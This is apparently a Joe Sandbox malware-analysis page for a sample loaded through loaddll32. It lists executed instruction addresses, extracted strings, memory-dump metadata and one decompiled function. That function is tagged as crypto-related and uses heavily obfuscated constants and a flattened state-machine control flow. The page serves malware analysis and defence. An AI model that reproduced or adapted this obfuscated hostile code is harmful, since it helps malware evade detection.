0x02b394d9
0x02b394e4
0x02b394ef
0x02b394fa
0x02b39505
0x02b3950d
0x02b39518
0x02b39520
0x02b39525
0x02b39529
0x02b3952e
0x02b39536
0x02b39541
0x02b3954c
0x02b39557
0x02b39562
0x02b39577
0x02b3957a
0x02b39581
0x02b3958c
0x02b39599
0x02b3959d
0x02b395aa
0x02b395ae
0x02b395b6
0x02b395c1
0x02b395c9
0x02b395d4
0x02b395df
0x02b395ea
0x02b395f5
0x02b39600
0x02b3960b
0x02b39616
0x02b39621
0x02b3962c
0x02b39637
0x02b39642
0x02b39658
0x02b3965f
0x02b3966a
0x02b39672
0x02b3967e
0x02b39683
0x02b39689
0x02b39691
0x02b39699
0x02b396a4
0x02b396af
0x02b396c1
0x02b396c4
0x02b396cb
0x02b396d6
0x02b396e1
0x02b396ec
0x02b396f7
0x02b3970a
0x02b39711
0x02b3971c
0x02b39724
0x02b3972c
0x02b39734
0x02b3973c
0x02b39744
0x02b39751
0x02b3975c
0x02b39767
0x02b3976f
0x02b39774
0x02b39779
0x02b39781
0x02b39789
0x02b39794
0x02b3979f
0x02b397aa
0x02b397c0
0x02b397c9
0x02b397d4
0x02b397df
0x02b397ea
0x02b397f2
0x02b397fd
0x02b39805
0x02b3980a
0x02b3980f
0x02b39817
0x02b3981f
0x02b3982a
0x02b39835
0x02b39840
0x02b3984b
0x02b39856
0x02b39861
0x02b3986c
0x02b39874
0x02b3987c
0x02b39887
0x02b39892
0x02b3989d
0x02b398a8
0x02b398b3
0x02b398be
0x02b398c9
0x02b398db
0x02b398e0
0x02b398e9
0x02b398f4
0x02b39907
0x02b3990a
0x02b39919
0x02b39920
0x02b3992b
0x02b39941
0x02b39948
0x02b39953
0x02b3995f
0x02b39962
0x02b39966
0x02b3996b
0x02b39973
0x02b3997b
0x02b39986
0x02b3998e
0x02b39996
0x02b399a1
0x02b399ac
0x02b399b7
0x02b399bf
0x02b399cc
0x02b399dc
0x02b399e7
0x02b399f2
0x02b399fd
0x02b39a05
0x02b39a10
0x02b39a24
0x02b39a29
0x02b39a30
0x02b39a37
0x02b39a42
0x02b39a4d
0x02b39a55
0x02b39a5d
0x02b39a65
0x02b39a6a
0x02b39a72
0x02b39a7d
0x02b39a88
0x02b39a93
0x02b39aa7
0x02b39aac
0x02b39ab3
0x02b39ac3
0x02b39aca
0x02b39aca
0x02b39ad5
0x02b39ad5
0x02b39ad5
0x02b39ad5
0x02b39adb
0x02b39adb
0x02b39ae1
0x02b39ae1
0x02b3a3ec
0x02b3a3f3
0x02b3a406
0x02b3a40d
0x02b3a40d
0x02b39ae7
0x02b39aed
0x02b39d2c
0x02b39d32
0x02b39e70
0x02b39e76
0x02b39f12
0x02b39f17
0x02b39ad5
0x02b39ad5
0x02b39ad5
0x02b39adb
0x02b39adb
0x00000000
0x02b39adb
0x00000000
0x02b39ad5
0x02b39e7c
0x02b39e82
0x02b39efc
0x02b39f01
0x00000000
0x02b39f01
0x02b39e84
0x02b39e8a
0x02b39ed0
0x02b39edc
0x02b39ee5
0x02b39eed
0x00000000
0x02b39eed
0x02b39e8c
0x02b39e92
0x00000000
0x00000000
0x02b39ea6
0x02b39eaf
0x02b39eb7
0x00000000
0x02b39eb7
0x02b39d38
0x02b39e5a
0x02b39e63
0x02b39e65
0x02b39c17
0x02b39c17
0x00000000
0x02b39c17
0x02b39d3e
0x02b39d44
0x02b39e3c
0x02b39e41
0x02b39e43
0x00000000
0x00000000
0x02b39e49
0x00000000
0x02b39e49
0x02b39d4a
0x02b39d50
0x02b39e0f
0x02b39e14
0x02b39e1b
0x02b39e23
0x00000000
0x02b39e23
0x02b39d52
0x02b39d58
0x02b39db7
0x02b39dbe
0x02b39dc3
0x00000000
0x02b39dc3
0x02b39d5a
0x02b39d60
0x00000000
0x00000000
0x02b39d82
0x02b39d9e
0x02b39da3
0x02b39da6
0x02b39dad
0x00000000
0x02b39dad
0x02b39af3
0x02b39d15
0x02b39d1a
0x02b39d1c
0x00000000
0x00000000
0x02b39d22
0x00000000
0x02b39d22
0x02b39af9
0x02b39aff
0x02b39c82
0x02b39c88
0x02b3a3dc
0x00000000
0x02b3a3e2
0x02b39c8e
0x02b39c94
0x02b39cf8
0x02b39cfd
0x00000000
0x02b39cfd
0x02b39c96
0x02b39c9c
0x02b39cdb
0x02b39ce0
0x02b39ce7
0x00000000
0x02b39ce7
0x02b39c9e
0x02b39ca4
0x00000000
0x00000000
0x02b39cc3
0x02b39cca
0x02b39cca
0x00000000
0x02b39cca
0x02b39b05
0x02b39c63
0x02b39c68
0x02b39c6f
0x02b39c77
0x00000000
0x02b39c77
0x02b39b11
0x02b39bf6
0x02b39bfb
0x02b39bfd
0x02b39c26
0x02b39c2f
0x02b39c37
0x00000000
0x02b39c37
0x02b39c06
0x02b39c0f
0x02b39c11
0x02b39c11
0x00000000
0x02b39c11
0x02b39b1d
0x02b39bd1
0x02b39bd6
0x02b39bd8
0x00000000
0x00000000
0x02b39bde
0x00000000
0x02b39bde
0x02b39b29
0x02b39b61
0x02b39b68
0x02b39bbc
0x02b39bbc
0x00000000
0x02b39bbc
0x02b39b95
0x02b39b9a
0x02b39b9d
0x02b39ba4
0x02b39bb7
0x00000000
0x02b39ba6
0x02b39ba6
0x00000000
0x02b39ba6
0x02b39ba4
0x02b39b31
0x00000000
0x02b39b37
0x02b39b50
0x02b39b57
0x00000000
0x02b39b57
0x02b39f21
0x02b39f21
0x02b39f27
0x02b3a137
0x02b3a13d
0x02b3a284
0x02b3a28a
0x02b3a3af
0x02b3a3b4
0x00000000
0x02b3a3b4
0x02b3a290
0x02b3a296
0x02b3a399
0x02b3a39e
0x00000000
0x02b3a39e
0x02b3a29c
0x02b3a2a2
0x02b3a2db
0x02b3a2fd
0x02b3a319
0x02b3a325
0x02b3a33b
0x02b3a356
0x02b3a381
0x02b3a386
0x02b3a386
0x00000000
0x02b3a2a2
0x02b3a143
0x02b3a27a
0x00000000
0x02b3a27a
0x02b3a149
0x02b3a14f
0x02b3a1dd
0x02b3a1e2
0x02b3a1e7
0x02b3a1ea
0x02b3a1ec
0x02b3a1f4
0x02b3a1fb
0x02b3a1fd
0x02b3a218
0x02b3a219
0x02b3a22a
0x02b3a22c
0x02b3a22f
0x02b3a22f
0x02b3a236
0x02b3a239
0x02b3a254
0x02b3a255
0x02b3a264
0x02b3a269
0x02b3a26c
0x02b3a26c
0x02b3a1ee
0x02b3a1ee
0x02b3a1ee
0x02b3a26e
0x02b3a270
0x00000000
0x02b3a270
0x02b3a151
0x02b3a153
0x02b3a1b4
0x02b3a1b9
0x02b3a1ba
0x00000000
0x02b3a1ba
0x02b3a155
0x02b3a15b
0x02b3a18c
0x02b3a191
0x02b3a198
0x00000000
0x02b3a198
0x02b3a15d
0x02b3a163
0x00000000
0x00000000
0x02b3a169
0x02b3a170
0x02b3a172
0x00000000
0x02b3a172
0x02b39f2d
0x02b3a121
0x02b3a126
0x02b3a12d
0x00000000
0x02b3a12d
0x02b39f33
0x02b39f39
0x02b39fd2
0x02b39fd8
0x02b3a106
0x02b3a10b
0x02b3a10d
0x00000000
0x00000000
0x02b3a113
0x00000000
0x02b3a113
0x02b39fde
0x02b39fe4
0x02b3a0e4
0x02b3a0e9
0x02b3a0eb
0x00000000
0x00000000
0x02b3a0f1
0x00000000
0x02b3a0f1
0x02b39fea
0x02b39ff0
0x02b3a066
0x02b3a06d
0x02b3a072
0x02b3a075
0x02b3a077
0x02b3a0b0
0x02b3a0b7
0x02b3a0ba
0x02b3a0c6
0x02b3a0c8
0x02b3a0d3
0x02b3a0d3
0x00000000
0x02b3a0d3
0x02b3a0ca
0x02b3a0cd
0x02b39f85
0x02b39f85
0x00000000
0x02b39f85
0x00000000
0x02b3a0cd
0x02b3a0bc
0x00000000
0x02b3a0bc
0x02b3a08f
0x02b3a090
0x02b3a09f
0x02b3a0a4
0x02b3a0a7
0x02b3a0a9
0x00000000
0x02b3a0a9
0x02b39ff2
0x02b39ff8
0x00000000
0x00000000
0x02b3a00c
0x02b3a015
0x02b3a029
0x02b3a02a
0x02b3a039
0x02b3a03e
0x02b3a041
0x00000000
0x02b3a041
0x02b39f3f
0x02b39fc3
0x02b39fc8
0x00000000
0x02b39fc8
0x02b39f41
0x02b39f47
0x02b3a401
0x00000000
0x02b3a401
0x02b39f4d
0x02b39f53
0x02b39fb0
0x02b39fb5
0x00000000
0x02b39fb5
0x02b39f55
0x02b39f5b
0x02b39f9a
0x02b39f9f
0x00000000
0x02b39f9f
0x02b39f5d
0x02b39f63
0x00000000
0x00000000
0x02b39f70
0x02b39f75
0x02b39f77
0x02b39f80
0x02b39f80
0x00000000
0x02b39f77
0x02b3a3b9
0x02b3a3b9
0x00000000

Strings

|V, xrefs: 02B38D29
Uj`, xrefs: 02B394FA
Jvmw, xrefs: 02B38BDD
E, xrefs: 02B38CF8
C", xrefs: 02B38CBD
S, xrefs: 02B3A185
LNe, xrefs: 02B391B9
s2O, xrefs: 02B39953
F, xrefs: 02B390E0
C, xrefs: 02B39734
/1, xrefs: 02B393BB
;w, xrefs: 02B38B19
Reo, xrefs: 02B392FD
t0+, xrefs: 02B3879F
08s%, xrefs: 02B3865A
C", xrefs: 02B3878A
.MZ, xrefs: 02B396D6
_1, xrefs: 02B39781
jmI, xrefs: 02B38FAF
BO6, xrefs: 02B399BF
Kx!, xrefs: 02B3997B
l-viewscalefactor-l1-1-0, xrefs: 02B39B17, 02B39CFD
+>, xrefs: 02B39861
W?n, xrefs: 02B38BF8
Q2N, xrefs: 02B38DC3
t, xrefs: 02B393E3
XG, xrefs: 02B38FFA
"{6, xrefs: 02B39471
AW, xrefs: 02B39A55
3}, xrefs: 02B39789
L}, xrefs: 02B39139
Tvs, xrefs: 02B38C30

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$l-viewscalefactor-l1-1-0$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3648787914
Opcode ID: 27f129a249f380be8f77ae336f803de7a67fcd8037d23b5b7d6f238d33a81c84
Instruction ID: 6f392e92d3ec87ba034c4c6007212fbafaac66782f7b9ac6b9677416e70cbbff
Opcode Fuzzy Hash: 27f129a249f380be8f77ae336f803de7a67fcd8037d23b5b7d6f238d33a81c84
Instruction Fuzzy Hash: FFE211719083818BD379CF25C58AACFBBE1BB85318F10895DE5DE96260DBB09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B3A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E02B3A871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E02B51F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E02B52B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E02B4E1F8(0x2b319bc, _v2684, __eflags);
								E02B544AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E02B4FECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E02B485FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E02B50DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E02B409DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E02B3BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E02B52D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x2b3188c,  &_v2604,  &_v2084, E02B4E1F8(0x2b3188c, _v2640, __eflags));
										E02B4FECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E02B3BFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E02B51538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E02B52B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E02B50A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E02B4D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E02B31A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E02B40CF9();
									_t758 = E02B400C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E02B3F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x02b3a871
0x02b3a877
0x02b3a881
